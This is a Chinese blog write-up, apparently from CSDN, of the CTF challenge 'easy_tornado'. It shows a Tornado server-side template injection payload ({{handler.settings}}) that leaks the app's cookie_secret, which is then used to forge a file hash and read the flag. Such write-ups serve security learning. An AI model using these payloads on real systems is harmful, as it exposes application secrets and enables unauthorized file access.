[护网杯 2018]easy_tornado

本文详细介绍了通过分析Tornado框架的render函数,利用SSTI漏洞寻找cookie_secret的过程。通过尝试不同的payload,最终成功构造了请求,获取了flag。同时,提到了在PHP中处理连接字符串时需要注意的细节。
摘要由CSDN通过智能技术生成

题目打开有三个链接

点第一个发现

第三个

猜测这里的filehash就是md5加密得到的,我们需要找到cookie_secret

在第二个链接中

有个render,而且题目是easy_tornado,可是SSTI

因为render()是tornado里的函数,可以生成html模板。是一个渲染函数 ,就是一个公式,能输出前端页面的公式。

tornado是用Python编写的Web服务器兼Web应用框架,简单来说就是用来生成模板的东西。和Python相关,和模板相关

尝试

/file?filename=/fllllllllllllag&filehash={{1}}

发现

报错,可能存在过滤

然后我们需要找到cookie_secret

百度得到Tornado框架的附属文件handler.settings中存在cookie_secret

此时构造payload:

http://71b67625-1f9d-4e09-bcb6-cee825a1a3a5.node4.buuoj.cn:81/error?msg={{handler.settings}}

得到提示信息,得到cookie_secret:61375ac6-5e1d-4510-a256-12786c3e1f09

然后结合md5(cookie_secret+md5(filename))

即md5('61375ac6-5e1d-4510-a256-12786c3e1f09'+md5('/fllllllllllllag'))

得到

(注意使用php写的话中间的是 “.”)

然后得到payload:

/file?filename=/fllllllllllllag&filehash=17f40d52bf376fb1d8637095e2854997

得到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值